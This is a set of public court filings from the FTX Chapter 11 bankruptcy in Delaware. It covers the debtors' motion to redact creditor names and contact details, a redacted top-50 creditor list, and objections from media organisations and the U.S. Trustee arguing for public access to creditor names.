[4]     For a breach of the EU GDPR, the organization may be fined up to the higher of €20 million or 4% of worldwide annual turnover of the preceding financial year.  *See* General Data Protection Regulation (EU) 2016/679, art. 83(5).  For a breach of the UK GDPR, the organization may be fined up to the higher of £17.5 million or 4% of annual worldwide turnover in the preceding financial year.  *See* United Kingdom Data Protection Act 2018, section 157(5)(a) (as amended by the Data Protection, Privacy and Electronic Communications (Amendments etc.) (EU Exit) Regulations 2019).

22.     Additionally, the Debtors will instruct the Claims and Noticing Agent to serve the individuals at their personal addresses or e-mail addresses, as applicable, ensuring that each individual creditor will receive the same notices in these Chapter 11 Cases as all other creditors without the potentially harmful disclosure of these details.  The Debtors will also make the unredacted version of any applicable filings redacted pursuant to the proposed Orders available to the Court, the U.S. Trustee and counsel to any official committee appointed in these Chapter 11 Cases and, upon Court order, to any other party.

23.     Accordingly, the Debtors respectfully submit that cause exists to authorize the Debtors to redact from any filing with the Court or made publicly available in these Chapter 11 Cases, (a) the address and e-mail addresses of any individual creditors or equity holders and (b) the name, address and e-mail address of any individual creditors or equity holders protected by the GDPR.

## IV.     The Court May Establish Procedures for Providing Notice to Creditors.

24.     As stated above, by separate application, the Debtors are seeking authority to retain the Claims and Noticing Agent.  The Debtors propose that the Claims and Noticing Agent undertake all mailings or e-mailing, as applicable, directed by the Court, the U.S. Trustee or as required by the Bankruptcy Code.  The Claims and Noticing Agent's assistance with mailing and e-mailing, as applicable, and preparing creditor lists and notices will ease the administrative burden on the Court and the U.S. Trustee.

25.     In order to assist the Claims and Noticing Agent with these tasks, the Debtors respectfully request that the Court establish the procedures outlined herein.  Bankruptcy Rule 2002(a) provides, in relevant part, that "the clerk, or some other person as the court may direct, shall give the debtor, the trustee, all creditors and indenture trustees at least 21 days' notice by mail of . . . the meeting of creditors under § 341 or § 1104(b) of the Code."  Fed. R.

Bank. P. 2002(a)(1). As requested in the Creditor List Motion, the Debtors seek authority for the Claims and Noticing Agent to serve the notice of commencement of these Chapter 11 Cases (the "Notice of Commencement") by e-mail to creditors, and will serve in that manner, if granted.

26.     Bankruptcy Rule 2002(l) permits the Court to order "notice by publication if it finds that notice by mail is impracticable or that it is desired to supplement the notice." Fed. R. Bankr. P. 2002(l). In addition to e-mailing the Notice of Commencement, the Debtors propose to publish the Notice of Commencement, as soon as reasonably practicable, on the website maintained by the Claims and Noticing Agent at https://cases.ra.kroll.com/FTX. The Debtors believe that such publication of the Notice of Commencement provides sufficient notice to persons who did not otherwise receive notice by e-mail.

27.     These proposed procedures will ensure that the Debtors' creditors receive prompt notice of the commencement of these Chapter 11 Cases and of the meeting of creditors. Section 105(a) of the Bankruptcy Code empowers the Court to "issue any order, process, or judgment that is necessary to carry out the provisions of this title." 11 U.S.C. § 105(a). The Debtors submit that implementing these procedures is within the Court's equitable powers under section 105(a) of the Bankruptcy Code. The Debtors accordingly request that the Court approve the foregoing as providing sufficient notice of the commencement of these Chapter 11 Cases.

## Notice

28.     No creditors' committee, trustee or examiner has been appointed in these Chapter 11 Cases. Notice of this Motion has been provided to: (a) the U.S. Trustee; (b) the Securities and Exchange Commission; (c) the Internal Revenue Service; (d) the United States Department of Justice; (e) the United States Attorney for the District of Delaware; (f) the parties identified on the Debtors' consolidated list of 50 largest unsecured creditors; and (g) to the extent not listed herein, those parties requesting notice pursuant to Bankruptcy Rule 2002. The Debtors

submit that, in light of the nature of the relief requested, no other or further notice need be provided.

### **No Prior Request**

29.     No prior motion for the relief requested herein has been made to this or any other Court.

**[REMAINDER OF PAGE INTENTIONALLY LEFT BLANK]**

**A0042**

WHEREFORE, for the reasons set forth herein, the Debtors respectfully request that the Court (a) enter the Interim Order, substantially in the form attached hereto as <u>Exhibit A</u>, (b) enter the Final Order, substantially in the form attached hereto as <u>Exhibit B</u>, and (c) grant such other and further relief as is just and proper.

Dated: November 19, 2022
      Wilmington, Delaware

**LANDIS RATH & COBB LLP**

*/s/ Kimberly A. Brown*
Adam G. Landis (No. 3407)
Kimberly A. Brown (No. 5138)
Matthew R. Pierce (No. 5946)
919 Market Street, Suite 1800
Wilmington, Delaware 19801
Telephone: (302) 467-4400
Facsimile: (302) 467-4450
E-mail: landis@lrclaw.com
       brown@lrclaw.com
       pierce@lrclaw.com

-and-

**SULLIVAN & CROMWELL LLP**
Andrew G. Dietderich (admitted *pro hac vice*)
James L. Bromley (admitted *pro hac vice*)
Brian D. Glueckstein (admitted *pro hac vice*)
Alexa J. Kranzley (admitted *pro hac vice*)
125 Broad Street
New York, NY 10004
Telephone: (212) 558-4000
Facsimile: (212) 558-3588
E-mail: dietdericha@sullcrom.com
       bromleyj@sullcrom.com
       gluecksteinb@sullcrom.com
       kranzleya@sullcrom.com

*Proposed Counsel for the Debtors*
*and Debtors-in-Possession*

# **EXHIBIT A**

## **Top 50 List**

<table>
<tr><td>Fill in this information to identify the case:</td></tr>
<tr><td>Debtor name: FTX Trading, Ltd.</td></tr>
<tr><td>United States Bankruptcy Court for the: District of Delaware</td></tr>
<tr><td>Case number (if known): 22-11068 (JTD)</td></tr>
</table>

☐ Check if this is an amended filing

## Official Form 204

### Chapter 11 or Chapter 9 Cases: Consolidated List of Creditors Who Have the 50 Largest Unsecured Claims and Are Not Insiders
12/15

A list of creditors holding the 50 largest unsecured claims must be filed in a Chapter 11 or Chapter 9 case. Include claims which the debtor disputes. Do not include claims by any person or entity who is an insider, as defined in 11 U.S.C. § 101(31). Also, do not include claims by secured creditors, unless the unsecured claim resulting from inadequate collateral value places the creditor among the holders of the 50 largest unsecured claims.

| Name of creditor and complete mailing address, including zip code | Name, telephone number, and email address of creditor contact | Nature of the claim (for example, trade debts, bank loans, professional services, and government contracts) | Indicate if claim is contingent, unliquidated, or disputed | Amount of unsecured claim — If the claim is fully unsecured, fill in only unsecured claim amount. If claim is partially secured, fill in total claim amount and deduction for value of collateral or setoff to calculate unsecured claim. | | |
|---|---|---|---|---|---|---|
| | | | | Total claim, if partially secured | Deduction for value of collateral or setoff | Unsecured claim |
| 1 [On File] | Attn:<br>Title:<br>Email: [On File]<br>Phone: | Customer | Unliquidated | | | $ 226,280,579 |
| 2 [On File] | Attn:<br>Title:<br>Email: [On File]<br>Phone: | Customer | Unliquidated | | | $ 203,292,504 |
| 3 [On File] | Attn:<br>Title:<br>Email: [On File]<br>Phone: | Customer | Unliquidated | | | $ 174,273,628 |
| 4 [On File] | Attn:<br>Title:<br>Email: [On File]<br>Phone: | Customer | Unliquidated | | | $ 159,806,042 |
| 5 [On File] | Attn:<br>Title:<br>Email: [On File]<br>Phone: | Customer | Unliquidated | | | $ 130,925,226 |
| 6 [On File] | Attn:<br>Title:<br>Email: [On File]<br>Phone: | Customer | Unliquidated | | | $ 121,828,282 |
| 7 [On File] | Attn:<br>Title:<br>Email: [On File]<br>Phone: | Customer | Unliquidated | | | $ 113,407,278 |
| 8 [On File] | Attn:<br>Title:<br>Email: [On File]<br>Phone: | Customer | Unliquidated | | | $ 111,372,725 |
| 9 [On File] | Attn:<br>Title:<br>Email: [On File]<br>Phone: | Customer | Unliquidated | | | $ 110,796,069 |
| 10 [On File] | Attn:<br>Title:<br>Email: [On File]<br>Phone: | Customer | Unliquidated | | | $ 101,535,789 |
| 11 [On File] | Attn:<br>Title:<br>Email: [On File]<br>Phone: | Customer | Unliquidated | | | $ 96,091,549 |
| 12 [On File] | Attn:<br>Title:<br>Email: [On File]<br>Phone: | Customer | Unliquidated | | | $ 92,875,541 |
| 13 [On File] | Attn:<br>Title:<br>Email: [On File]<br>Phone: | Customer | Unliquidated | | | $ 91,524,544 |

| Name of creditor and complete mailing address, including zip code | Name, telephone number, and email address of creditor contact | Nature of the claim (for example, trade debts, bank loans, professional services, and government contracts) | Indicate if claim is contingent, unliquidated, or disputed | Amount of unsecured claim If the claim is fully unsecured, fill in only unsecured claim amount. If claim is partially secured, fill in total claim amount and deduction for value of collateral or setoff to calculate unsecured claim. | | |
|---|---|---|---|---|---|---|
| | | | | Total claim, if partially secured | Deduction for value of collateral or setoff | Unsecured claim |
| 14 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 91,077,210 |
| 15 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 79,040,176 |
| 16 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 76,803,466 |
| 17 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 74,406,285 |
| 18 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 64,201,186 |
| 19 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 57,020,030 |
| 20 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 51,568,710 |
| 21 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 46,223,471 |
| 22 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 41,823,882 |
| 23 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 41,249,881 |
| 24 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 36,604,907 |
| 25 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 36,501,648 |
| 26 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 36,180,640 |
| 27 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 33,964,083 |
| 28 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 33,896,476 |
| 29 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 33,011,863 |

| Name of creditor and complete mailing address, including zip code | Name, telephone number, and email address of creditor contact | Nature of the claim (for example, trade debts, bank loans, professional services, and government contracts) | Indicate if claim is contingent, unliquidated, or disputed | Amount of unsecured claim If the claim is fully unsecured, fill in only unsecured claim amount. If claim is partially secured, fill in total claim amount and deduction for value of collateral or setoff to calculate unsecured claim. | | |
|---|---|---|---|---|---|---|
| | | | | Total claim, if partially secured | Deduction for value of collateral or setoff | Unsecured claim |
| 30 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 31,045,450 |
| 31 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 30,000,000 |
| 32 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 30,000,000 |
| 33 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 29,700,640 |
| 34 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 28,408,773 |
| 35 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 27,790,014 |
| 36 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 27,735,198 |
| 37 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 26,115,451 |
| 38 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 26,054,880 |
| 39 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 25,161,483 |
| 40 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 25,000,000 |
| 41 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 24,466,606 |
| 42 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 24,287,388 |
| 43 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 22,731,088 |
| 44 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 22,715,202 |
| 45 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 22,649,201 |

| Name of creditor and complete mailing address, including zip code | Name, telephone number, and email address of creditor contact | Nature of the claim (for example, trade debts, bank loans, professional services, and government contracts) | Indicate if claim is contingent, unliquidated, or disputed | Amount of unsecured claim If the claim is fully unsecured, fill in only unsecured claim amount. If claim is partially secured, fill in total claim amount and deduction for value of collateral or setoff to calculate unsecured claim. | | |
| | | | | Total claim, if partially secured | Deduction for value of collateral or setoff | Unsecured claim |
|---|---|---|---|---|---|---|
| 46 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 22,620,540 |
| 47 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 22,322,177 |
| 48 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 22,014,600 |
| 49 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 21,601,593 |
| 50 [On File] | Attn: Title: Email: [On File] Phone: | Customer | Unliquidated | | | $ 21,344,561 |

**A0048**

## IN THE UNITED STATES BANKRUPTCY COURT
## FOR THE DISTRICT OF DELAWARE

| | | |
|---|---|---|
| In re: | ) | Chapter 11 |
| | ) | Case No. 22-11068 (JTD) |
| FTX TRADING LTD., *et al.*, | ) | (Joint Administration Pending) |
| | ) | |
| Debtors. | ) | Hearing: Dec. 16, 2022, 10:00 a.m. |

## EXPEDITED MOTION OF BLOOMBERG L.P., DOW JONES & COMPANY, INC., THE NEW YORK TIMES COMPANY AND THE FINANCIAL TIMES LTD.  TO INTERVENE FOR THE LIMITED PURPOSE OF OBJECTING TO THE MOTION OF DEBTORS FOR ENTRY OF A FINAL ORDER AUTHORIZING THE DEBTORS TO REDACT OR WITHHOLD CERTAIN CONFIDENTIAL INFORMATION OF CUSTOMERS AND PERSONAL INFORMATION OF INDIVIDUALS

Bloomberg L.P., Dow Jones & Company, Inc., The New York Times Company, and The Financial Times Ltd. (collectively, the "Media Intervenors") hereby move to intervene for the limited purpose of objecting to Debtors' Motion for Entry of a Final Order Authorizing the Debtors to Redact or Withhold Certain Confidential Information of Customers and Personal Information of Individuals.

## **BACKGROUND**

1.     When Debtors filed their petition for relief under Chapter 11, it sent shockwaves throughout the financial community in general, and the crypto investing community in particular.  FTX's new CEO John Ray told this Court that "never in my career have I seen such a complete failure of corporate controls and such a complete absence of trustworthy financial information as occurred here. From compromised systems integrity and faulty regulatory oversight abroad, to the concentration of control in the hands of a very small group of

inexperienced, unsophisticated and potentially compromised individuals, this situation is unprecedented." Declaration Of John J. Ray III in Support of Chapter 11 Petitions and First Day Pleadings," D.I. 24 (November 17, 2022).

2. The bankruptcy filing is of significant and legitimate public concern given FTX's leading role in cryptocurrency, the scale of potential mismanagement and wrongdoing, the reputational and financial impact of its collapse on the cryptocurrency field,[1] the scale of creditors' losses, and the related, collateral financial impact on third parties and markets.[2] Records in these proceedings indicate that potentially more than a million creditors will be affected. D.I. 45 ¶7 ("the Debtors have hundreds of thousands if not over one

---

[1] *E.g.,* Allison Morrow, "*BlockFi files for bankruptcy as FTX contagion grips crypto markets,*" https://www.cnn.com/2022/11/28/business/blockfi-bankruptcy-ftx-fallout/index.html (Nov. 28, 2022); Laura Kelly, "*Here's the Latest on the FTX Collapse,*" https://www.nytimes.com/article/ftx-bankruptcy-crypto-collapse.html (Nov. 28, 2022); Vildana Hajric, "*Crypto Markets Buckle as FTX Bankruptcy Spurs Search for Casualties,*" https://www.bloomberg.com/news/articles/2022-11-11/crypto-markets-buckle-as-ftx-filing-spurs-search-for-casualties?leadSource=uverify%20wall (Nov. 11, 2022); Jonathan Randles & Soma Biswas, "*DOJ Watchdog Calls for Independent FTX Probe in Bankruptcy,*" https://www.wsj.com/articles/doj-watchdog-calls-for-independent-ftx-probe-in-bankruptcy-11669940711 (Dec. 1, 2022).

[2] "Robinhood…has seen its stock price take a hit; FTX took a 7.6% stake in the platform earlier this year. Elsewhere, high-profile investors like Sequoia have written down their investments in FTX — worth hundreds of millions of dollars — to zero. The wild gyrations of bitcoin and other digital coins may be a result of forced selling, as FTX and others have had to raise funds to cover withdrawals and margin calls and raise capital." PYMNTS, "*BitPay CEO Says Knock-On Effects of FTX's Collapse Not Yet Clear,*" https://www.pymnts.com/cryptocurrency/2022/bitpay-ceo-knock-on-effects-of-ftxs-collapse-not-yet-clear/ (Nov. 14, 2022).

million creditors and other parties-in-interest"). The Media Intervenors and other news organizations have been closely reporting on these proceedings and issues.[3]

3.     Debtors have been accused of lack of transparency in their business. That mindset appears to have carried over to this bankruptcy, as they have taken the extraordinary step of seeking to keep under seal their list of creditors, a

---

[3]     *E.g.*, Joshua Oliver, Scott Chipolina and Nikou Asgari, "*Sam Bankman-Fried's $32bn FTX crypto empire files for bankruptcy*," https://www.ft.com/content/afe56c4e-2d68-457e-bbb2-476752d5f02e (Nov. 11, 2022); Alun Long and Hannah Lang, "*Crypto exchange FTX files for bankruptcy as wunderkind CEO exits*," https://www.reuters.com/business/ftx-start-us-bankruptcy-proceedings-ceo-exit-2022-11-11/ (Nov. 11, 2022); Jeremy Hill, "*Bankman-Fried Resigns From FTX, Puts Empire in Bankruptcy*," https://www.bloomberg.com/news/articles/2022-11-11/ftx-com-goes-bankrupt-in-stunning-reversal-for-crypto-exchange?utm_campaign=socialflow-organic&utm_source=twitter&utm_medium=social&utm_content=crypto&leadSource=uverify%20wall (Nov. 11, 2022); David Yaffe-Bellany, "*Embattled Crypto Exchange FTX Files for Bankruptcy*," https://www.nytimes.com/2022/11/11/business/ftx-bankruptcy.html (Nov. 11, 2012); Rachel Martin and David Gura, "Bankman-Fried Resigns From FTX, Puts Empire in Bankruptcy "Cryptocurrency exchange FTX files for bankruptcy," https://www.npr.org/2022/11/11/1135984033/once-valued-at-more-than-30-billion-crypto-currency-ftx-is-near-bankruptcy (Nov. 11, 2022); Jonathan Ponciano, "*FTX Files For Bankruptcy—Former Billionaire Sam Bankman-Fried Resigns As CEO*," https://www.forbes.com/sites/jonathanponciano/2022/11/11/ftx-files-for-bankruptcy-former-billionaire-sam-bankman-fried-resigns-as-ceo/?sh=7c60db40231d (Nov. 11, 2022); Rob Wile, "*Crypto giant FTX to file for bankruptcy, CEO Sam Bankman-Fried steps down*," https://www.nbcnews.com/tech/crypto/crypto-giant-ftx-file-bankruptcy-ceo-sam-bankman-fried-steps-rcna56749 (Nov. 11, 2022) Caitlin Ostroff, Vicky Ge Huang and Alexander Gladstone, "*FTX Files for Bankruptcy, CEO Sam Bankman-Fried Resigns*," https://www.wsj.com/articles/ftx-files-for-chapter-11-bankruptcy-11668176869?st=h0wt7ph3igjxfqe&reflink=desktopwebshare_permalink (Nov. 11, 2022).

3

**A0051**

document which, with very few exceptions, has historically been open to the public. Intervenors object to the continued sealing and redaction of information that historically has been quintessentially public in nature.

## MOTION TO INTERVENE AND TO UNSEAL JUDICIAL RECORDS

4.     The Media Intervenors seek to intervene in these proceedings pursuant to Federal Rule of Bankruptcy Procedure 2018(a) ("Rule 2018(a)") for the limited purpose of vindicating the public's right of access to the sealed and redacted judicial documents filed with the Court in this matter. The records should be unsealed and unredacted for the reasons set forth below.

5.     Bloomberg LP is the owner and operator of Bloomberg News. Bloomberg's newsroom of more than 2,700 journalists and analysts delivers thousands of stories a day, producing content that is featured across multiple platforms, including digital, TV, radio, video, print and live events.

6.     Dow Jones & Company is a leading provider of news and business information through *The Wall Street Journal* and other publications, including *WSJ Pro Bankruptcy* and Dow Jones Newswires. *The Wall Street Journal* engages readers across print, digital, mobile, social, podcast and video. Building on its heritage as the preeminent source of global business and financial news, the *Journal* includes coverage of U.S. & world news, politics, arts, culture, lifestyle, sports, and health. Dow Jones is an indirect subsidiary of News Corporation, a publicly held company. Dow Jones's headquarters are located at 1211 Avenue of the Americas, New York, NY 10036.

7.     The New York Times, Inc. is the publisher of The New York Times and operates the news website nytimes.com.

8.     The Financial Times Limited, incorporated in England, is one of the world's leading business news organizations, recognized internationally for the authority, integrity and accuracy of its publications which include the Financial Times newspaper and FT.com (the "FT"). It is part of the FT Group which, as part of Nikkei Inc., provides a broad range of business information, news and services for the global business community including FT Specialist and a number of services and joint ventures. The FT has a paying readership of 1.2 million, more than one million of which are digital subscribers.

9.     Rule 2018(a) permits "any interested entity" to intervene in a bankruptcy matter, either generally or "with respect to any specified matter." Fed. R. Bankr. Proc. 2018(a). Courts, including this Court, have routinely recognized the right of the media (and members of the public generally) to intervene to challenge sealing orders.  *E.g., Pansy v. Borough of Stroudsburg,* 23 F.3d 772, 778 (3d Cir. 1994); *In re Alterra Healthcare Corp.,* 353 B.R. 66, 70 (D. Del. 2006)*; In re Peregrine Systems, Inc*., 311 B.R. 679, 687 (D. Del. July 12, 2004*); In re Symington*, 209 B.R. 678, 690 (Bankr. D.Md. 1997); *In re Thow*, 392 B.R. 860, 864 (Bankr. W.D. Wash. 2007).

10.    The news media acts as the eyes and ears of the public, informing the public of issues of the day. *Houchins v. KQED, Inc*., 438 U.S. 1, 8 (1978). This valuable social function is hampered by sealing of judicial records.  As

5

**A0053**

members of the public, the Media Intervenors suffer an identical injury, and so intervention is proper.

11. For these reasons, the Court should grant Media Intervenors' request to intervene in these proceedings under Rule 2018(a) to assert the public's right of access to the sealed judicial documents.

12. There is a strong presumption and public policy in favor of public access to court records. *See, e.g., In re Cendant Corp.*, 260 F.3d 183, 192 (3d Cir. 2001); *Mosaic Techs., Inc. v. LSI Corp.*, 878 F.Supp.2d 503, 507 (D. Del. 2012); *In re Continental Airlines,* 150 B.R. 334, (D. Del. 1993). The right of public access is "rooted in the public's First Amendment right to know about the administration of justice." *Video Software Dealers Ass'n v. Orion Pictures Corp. (In re Orion Pictures Corp.)*, 21 F.3d 24, 26 (2d Cir. 1994) (stating that public access "helps safeguard the integrity, quality, and respect in our judicial system, and permits the public to keep a watchful eye on the workings of public agencies," citations omitted).

13. The "policy of open inspection" in Section 107 "evidences congress's strong desire to preserve the public's right of access to judicial records in bankruptcy proceedings." *Id. Accord In re Bell & Beckwith*, 44 B.R. 661, 664 (Bankr. N.D. Ohio 1984) ("This policy of open inspection, established in the Bankruptcy Code itself, is fundamental to the operating of the bankruptcy system and is the best means of avoiding any suggestion of impropriety that might or could be raised").

6

**A0054**

## DEBTORS HAVE FAILED TO SATISFY THEIR BURDEN
## FOR SEALING RECORDS

14.     In seeking to seal documents, Debtors faces a heavy burden of proof. "Evidence -- not just argument -- is required to support the extraordinary remedy of sealing." *In re Motors Liquidation Company*, 561 B.R. 36, 43 (Bankr. S.D.N.Y. 2016). *Accord Publicker Indus. v. Cohen*, 733 F.2d 1059, 1071 (3d Cir. 1984); *In re Wells Fargo Bank, N.A.*, 2019 WL 642850 at *2 (Bankr. W.D. Pa. Feb. 14, 2019) ("The moving party has the burden of *establishing through evidence* that the information should be protected," italics in original).

15.     Debtors claim that their "customer list, and related customer data, is an important and valuable asset of the Debtors and the Debtors maintain their customer list in strict confidence." (Motion ¶13). They also claim that "Public dissemination of the Debtors' customer list could give the Debtors' competitors an unfair advantage to contact and poach those customers and would interfere with the Debtors' ability to sell their assets and maximize value for their estates at the appropriate time." (*Id.* ¶13).

16.     A vague statement that disclosure "could" result in giving competitors an unfair advantage does not satisfy the debtors' heavy burden. *Reed v. NBTY, Inc.*, 2014 WL 12284044 at *2 n.3 (C.D. Cal. Nov. 18, 2014) ("The vague contention that competitors could rely on these publicly available documents to support and launch a competing product is insufficient"); *In re Mata*, 2019 WL 10377718 at *3 (Bankr. C.D. Cal. Sept. 20, 2019) ("Defendants

repeated assertions that "[p]ublic disclosure of this private commercial information could negatively impact Defendants' competitive standing in the student loan industry" do not appear to satisfy the evidentiary burden imposed on Defendants…").

17.　In any event, there is no evidence to support these conclusory statements. *See In re Document Technologies Litigation* 282 F.Supp.3d 743, 747 (S.D.N.Y. 2017) (proponent of sealing has burden of establishing "through competent evidence," that document reveals trade secrets or other confidential business information). An unsworn statement in a motion is not evidence. *In re Valsartan N-Nitrosodimethylamine (NDMA), Losartan, and Irbesartan Products Liability Litigation*, 2020 WL 955059 at *2 (D. N.J. Feb. 27, 2020); *In re Ladevereaux*, 2006 WL 549239 at *3 n.2 (Bankr. D. Mass. Mar. 6, 2006) ("Counsel's statements in this motion are not evidence").

## REDACTING THE NAMES OF CREDITORS IS INAPPROPRIATE

18.　Initially, the Media Intervenors do not object to sealing the addresses and contact information of the creditors. Nonetheless, absent evidence of a genuine threat to the safety of the creditors, such redaction should not become the norm.

19.　While redaction of contact information arguably may be justified in some circumstances to prevent identity theft and harassment, releasing the names of the creditors neither exposes the creditors to risk of identity theft nor to personal danger.  It also does not create undue risk of unlawful injury.  *In re*

*Celsius Network LLC*, 644 B.R. 276, 291-95 (Bankr. S.D.N.Y. 2022) (authorizing redaction of contact information of customers of a cryptocurrency business but refusing to redact names of those customers).

20.     Debtors' arguments about the European General Data Protection Regulation are unavailing.  Debtors provide no legal authority explicitly dictating why the GDPR should apply to the bankruptcy cases of debtors filed in the United States, or specifically, why the foreign laws would take precedence in a situation where United States law requires the disclosure of the information. Section 107(c) provides the Court with discretion to protect an individual with respect to any identifying information to the extent the Court finds that disclosure of such information would create an undue risk of unlawful injury to the individual. 11 U.S.C. § 107(c). However, Debtors have failed to show that public disclosure of foreign citizens personal data in violation of the GDPR would constitute an unlawful injury to those individuals because the financial penalties (injury) would be imposed against Debtors under those laws. The Court should not treat foreign citizens differently than the United States citizens implicated in this case.  *In re Celsius Network LLC,* 644 B.R. 276 (Bankr. S.D.N.Y. 2022).  *See also In In re Blackwell,* 263 B.R. 505, 510 (W.D. Tex. 2000) ("the parties' expectations under the laws of various other jurisdictions is not at issue here. InverWorld maintains its offices in the United States. It was at least foreseeable that the laws of this country could be applied to at least some disputes these parties could have contemplated at the time they made their investments").

9

**A0057**

21.     Redacting the names of the creditors will have far-reaching impact as the case progresses. Will any creditor who wants to file a motion or an adversary proceeding be entitled to do so anonymously?  Would preference actions redact the names of defendants who are creditors?  This will turn the entire proceeding into a farce, with only the Debtor's name publicly spoken.  This would be contrary to Congress's "strong desire to preserve the public's right of access to judicial records in bankruptcy proceedings." *Video Software Dealers Ass'n*, 21 F.3d at 26 (quoted in *In re Alterra Healthcare Corp.*, 353 B.R. at 75).

22.     The Court has indicated that proofs of claim will not be submitted anonymously. If disclosure it inevitable, there is no point to keeping the names anonymous now.

## CONCLUSION

WHEREFORE, for the foregoing reasons, the Media Intervenors respectfully request that the Court deny Debtors' Motion for Entry of a Final Order Authorizing the Debtors to Redact or Withhold Certain Confidential Information of Customers and Personal Information of Individuals.

Alternatively, if the Court finds that one of the limited exceptions to public access applies, the Court should apply it narrowly, and that at least the names be public.

10

**A0058**

Respectfully submitted,


/s/ David L. Finger
David L. Finger (ID #2556)
Finger & Slanina, LLC
One Commerce Center
1201 N. Orange St., 7th fl.
Wilmington, DE 19801
(302) 573-2525
Attorney for Bloomberg, L.P.,
Dow Jones & Company, The New
York Times Inc. and the Financial
Times, Ltd.


Dated: December 9, 2022

# IN THE UNITED STATES BANKRUPTCY COURT
## FOR THE DISTRICT OF DELAWARE

| | : | |
|---|---|---|
| *In re* | : | Chapter 11 |
| | : | |
| FTX TRADING LTD., *et al.*,[1] | : | Case No. 22-11068 (JTD) |
| | : | (Jointly Administered) |
| Debtors. | : | |
| | : | **Hearing Date: December 16, 2022, at 10:00 a.m.** |
| | : | |
| | : | **Objection Deadline: December 9, 2022, extended for the U.S. Trustee to December 14, 2022 at 12:00 p.m.** |
| | : | |
| | | Re: D.I. 45 |

## UNITED STATES TRUSTEE'S OBJECTION TO THE MOTION OF THE DEBTORS FOR ENTRY OF INTERIM AND FINAL ORDERS (I) AUTHORIZING THE DEBTORS TO MAINTAIN A CONSOLIDATED LIST OF CREDITORS IN LIEU OF SUBMITTING A SEPARATE MATRIX FOR EACH DEBTOR, (II) AUTHORIZING THE DEBTORS TO REDACT OR WITHHOLD CERTAIN CONFIDENTIAL INFORMATION OF CUSTOMERS AND PERSONAL INFORMATION OF INDIVIDUALS AND (III) GRANTING CERTAIN RELATED RELIEF

Andrew R. Vara, the United States Trustee for Regions Three and Nine (the "U.S. Trustee"), through his undersigned counsel, files this objection (the "Objection") to the *Motion of the Debtors for Entry of Interim and Final Orders (I) Authorizing the Debtors to Maintain a Consolidated List of Creditors in Lieu of Submitting a Separate Matrix for Each Debtor, (II) Authorizing the Debtors to Redact or Withhold Certain Confidential Information of Customers and Personal Information of Individuals and (III) Granting Certain Related Relief* (the "Motion") [D.I. 45], and respectfully states:

---

[1] The last four digits of FTX Trading Ltd.'s and Alameda Research LLC's tax identification numbers are 3288 and 4063, respectively. Due to the large number of debtor entities in these chapter 11 cases, a complete list of the Debtors and the last four digits of their federal tax identification numbers is not provided herein. A complete list of such information may be obtained on the website of the Debtors' proposed claims and noticing agent at https://cases.ra.kroll.com/FTX.

**A0060**

## I.   PRELIMINARY STATEMENT

1.      The bankruptcy process operates, like the rest of the court system, on the bedrock principle of American jurisprudence that the public has a right of access to judicial records. Only under limited circumstances may a federal court restrict or deny that access.  Here, the Debtors seek authority for a wholesale redaction from "any paper filed or to be filed with the Court or made publicly available in these chapter 11 Cases," of the following information: (a) the names, addresses and email addresses of all customers (who are also creditors of the Debtors), whether such customers are individuals, or legal entities, (b) the names, addresses and email addresses of all non-customer individual creditors or equity holders who are citizens of the United Kingdom ("UK") or member nations of the European Union ("EU"), and are covered by the EU or UK General Data Protection Regulation (collectively the "GDPR"), and (c) the addresses and email addresses of all other creditors or equity holders who are individuals, regardless of citizenship.[2]   Mot. ¶ 12; Proposed Final Order ¶¶ 4, 5 [D.I. 45-2].  The documents that would be subject to such redactions include (but are not limited to) the Debtors' Creditor Matrix,[3] Consolidated Top 50 Creditor List, Schedules and Statements, the claims register, proof of claims and affidavits of service.

2.      The U.S. Trustee does not object to the filing under seal of the addresses or e-mail addresses of customers or other creditors who are individuals.  The U.S. Trustee does, however, object to the sealing of the *names* of such customers and creditors, and the sealing of the names, addresses and other contact information for customers or creditors who are not individuals.

---

